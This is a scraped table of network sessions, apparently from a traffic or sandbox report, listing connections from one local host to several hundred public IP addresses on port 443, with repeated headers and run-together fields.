                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19058192.168.2.1345438110.51.70.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19059192.168.2.1347950167.179.121.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19060192.168.2.133892087.235.87.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19061192.168.2.1339342183.127.209.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19062192.168.2.133706893.73.87.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19063192.168.2.1337678180.245.240.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19064192.168.2.133715696.169.102.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19065192.168.2.1347964195.152.78.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19066192.168.2.1341976136.20.236.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19067192.168.2.136015668.73.145.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19068192.168.2.1342988168.81.36.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19069192.168.2.1359884219.148.157.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19070192.168.2.133900479.247.100.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19071192.168.2.1357092104.64.248.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19072192.168.2.1357230107.66.202.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19073192.168.2.1355020129.219.233.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19074192.168.2.1339328202.116.197.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19075192.168.2.134723048.255.233.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19076192.168.2.133687818.54.51.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19077192.168.2.133338885.197.117.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19078192.168.2.1354212205.188.184.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19079192.168.2.1333934140.239.10.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19080192.168.2.1354150130.85.174.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19081192.168.2.1336456139.147.101.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19082192.168.2.1353448119.175.40.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19083192.168.2.1353588108.0.150.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19084192.168.2.134743469.15.159.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19085192.168.2.1356932115.48.207.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19086192.168.2.1347074145.136.71.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19087192.168.2.1339356169.101.140.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19088192.168.2.1352794148.247.113.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19089192.168.2.133581089.205.185.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19090192.168.2.1350898118.122.31.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19091192.168.2.133620488.54.196.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19092192.168.2.1352296185.104.37.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19093192.168.2.134176698.219.164.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19094192.168.2.1352452102.248.40.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19095192.168.2.135985662.230.233.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19096192.168.2.135672234.94.230.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19097192.168.2.1353302146.184.87.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19098192.168.2.1355334193.47.174.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19099192.168.2.1333712155.196.84.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19100192.168.2.135448493.166.189.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19101192.168.2.1359512130.204.167.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19102192.168.2.1353806187.236.139.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19103192.168.2.1357236115.43.242.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19104192.168.2.133359697.166.86.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19105192.168.2.133381289.179.6.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19106192.168.2.135184046.210.12.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19107192.168.2.134432490.241.98.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19108192.168.2.134987698.243.198.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19109192.168.2.134024447.115.189.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19110192.168.2.1340316119.113.73.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19111192.168.2.133392418.164.96.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19112192.168.2.133923299.127.52.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19113192.168.2.1350596130.212.36.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19114192.168.2.1335012203.165.238.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19115192.168.2.135558814.202.87.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19116192.168.2.1349030159.82.251.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19117192.168.2.133353664.207.35.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19118192.168.2.134057212.69.210.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19119192.168.2.1339790158.174.198.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19120192.168.2.1357576185.239.19.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19121192.168.2.1339950165.49.118.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19122192.168.2.1360346182.187.36.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19123192.168.2.13536021.250.217.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19124192.168.2.133895894.140.137.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19125192.168.2.1358052205.152.9.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19126192.168.2.133764290.156.85.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19127192.168.2.135214070.194.216.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19128192.168.2.13383628.157.198.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19129192.168.2.1333300138.27.194.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19130192.168.2.1345566159.96.101.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19131192.168.2.1357510181.59.62.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19132192.168.2.1335226223.63.152.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19133192.168.2.1334756163.163.15.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19134192.168.2.135785662.252.217.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19135192.168.2.133609045.85.144.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19136192.168.2.1334948101.37.178.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19137192.168.2.135875813.177.220.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19138192.168.2.1338072131.182.157.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19139192.168.2.133449462.154.76.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19140192.168.2.133856244.153.59.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19141192.168.2.135291463.129.120.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19142192.168.2.13395421.31.234.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19143192.168.2.1346674206.36.47.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19144192.168.2.1344056119.254.70.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19145192.168.2.135084078.7.247.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19146192.168.2.1356144173.201.207.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19147192.168.2.134903496.223.183.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19148192.168.2.135544252.170.173.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19149192.168.2.135684680.230.47.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19150192.168.2.134048276.218.228.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19151192.168.2.135256842.2.112.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19152192.168.2.133341689.78.37.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19153192.168.2.1333232113.101.131.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19154192.168.2.135697440.182.243.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19155192.168.2.133682023.71.2.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19156192.168.2.134063079.92.245.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19157192.168.2.134051872.144.27.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19158192.168.2.1341928103.172.234.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19159192.168.2.133405476.193.246.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19160192.168.2.135747032.215.208.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19161192.168.2.1345120100.37.78.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19162192.168.2.1358688118.45.93.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19163192.168.2.1340694132.200.106.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19164192.168.2.134318436.91.206.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19165192.168.2.135989095.175.238.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19166192.168.2.1346240110.59.252.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19167192.168.2.1334602117.146.21.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19168192.168.2.1358466189.48.163.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19169192.168.2.134153450.63.40.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19170192.168.2.1359184102.222.58.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19171192.168.2.133283644.253.14.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19172192.168.2.133678245.107.157.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19173192.168.2.1343998217.20.221.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19174192.168.2.1347628101.19.79.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19175192.168.2.1339934217.2.250.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19176192.168.2.1354918165.32.217.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19177192.168.2.13465028.180.43.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19178192.168.2.135232482.4.227.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19179192.168.2.134379289.22.65.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19180192.168.2.135778012.85.79.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19181192.168.2.1349424112.151.250.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19182192.168.2.135146051.91.161.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19183192.168.2.134305818.205.38.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19184192.168.2.1334634182.170.107.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19185192.168.2.134974668.66.104.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19186192.168.2.1352600158.249.22.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19187192.168.2.1351056118.99.71.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19188192.168.2.1339070155.151.204.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19189192.168.2.1357736149.101.67.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19190192.168.2.1335662180.183.134.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19191192.168.2.136015439.172.229.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192192.168.2.134789283.144.92.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19193192.168.2.135237248.252.116.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19194192.168.2.134256893.37.252.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19195192.168.2.133782054.247.148.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19196192.168.2.1341536212.46.13.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19197192.168.2.135834634.203.63.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19198192.168.2.133988020.229.202.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19199192.168.2.1345408155.6.85.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19200192.168.2.133342434.38.161.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19201192.168.2.1334040213.238.29.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19202192.168.2.1335654157.255.53.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19203192.168.2.1357588102.243.222.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19204192.168.2.1359190219.252.18.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19205192.168.2.134729274.32.100.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19206192.168.2.134080690.135.251.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19207192.168.2.135121681.237.122.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19208192.168.2.134374217.171.21.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19209192.168.2.1346784171.198.89.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19210192.168.2.1351418106.215.159.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19211192.168.2.1341638122.181.39.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19212192.168.2.134073096.155.42.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19213192.168.2.135062686.35.209.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19214192.168.2.1354670109.84.136.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19215192.168.2.1360646198.148.183.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19216192.168.2.1335104128.230.95.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19217192.168.2.1356298117.8.229.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19218192.168.2.1334636220.46.202.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19219192.168.2.1341570133.13.235.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19220192.168.2.134599093.172.224.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19221192.168.2.134966091.4.8.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19222192.168.2.133281484.177.59.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19223192.168.2.1345554129.134.14.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19224192.168.2.1354280138.221.86.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19225192.168.2.135962466.14.112.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19226192.168.2.1338378190.178.150.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19227192.168.2.1338916135.191.72.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19228192.168.2.135648882.127.250.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19229192.168.2.1351818152.119.148.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19230192.168.2.134582639.242.171.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19231192.168.2.1352658155.155.65.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19232192.168.2.1339542164.62.100.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19233192.168.2.13348901.237.2.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19234192.168.2.1343544169.88.150.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19235192.168.2.1344082163.148.203.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19236192.168.2.1350332176.158.29.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19237192.168.2.135682249.135.64.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19238192.168.2.135848418.221.128.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19239192.168.2.1333068218.157.68.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19240192.168.2.1343904218.2.148.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19241192.168.2.135413866.118.104.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19242192.168.2.1350354136.105.55.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19243192.168.2.1357326150.150.21.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19244192.168.2.1336040182.32.138.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19245192.168.2.1342064138.9.34.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19246192.168.2.135293632.157.69.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19247192.168.2.1335552123.152.247.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19248192.168.2.13592021.209.182.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19249192.168.2.1358134181.141.223.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19250192.168.2.1341364201.50.22.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19251192.168.2.1346478161.69.109.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19252192.168.2.133574278.146.61.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19253192.168.2.13408148.69.194.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19254192.168.2.1343494132.101.149.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19255192.168.2.135279032.4.196.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19256192.168.2.1338650106.141.157.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19257192.168.2.1358394115.153.117.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19258192.168.2.1344334204.241.26.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19259192.168.2.1352498121.70.55.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19260192.168.2.135977847.9.232.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19261192.168.2.133526894.198.137.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19262192.168.2.1348858217.73.39.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19263192.168.2.135272413.117.4.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19264192.168.2.1339048104.209.239.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19265192.168.2.135975679.230.80.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19266192.168.2.1350934200.190.49.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19267192.168.2.1350892216.191.47.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19268192.168.2.1359646105.150.123.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19269192.168.2.13459848.83.212.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19270192.168.2.133767463.136.140.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19271192.168.2.134196264.48.194.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19272192.168.2.135591824.194.35.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19273192.168.2.1350120176.111.228.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19274192.168.2.135367271.154.64.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19275192.168.2.1359550217.19.21.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19276192.168.2.1337154103.32.54.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19277192.168.2.1351420201.49.235.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19278192.168.2.1333724114.90.21.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19279192.168.2.135774295.150.105.131443
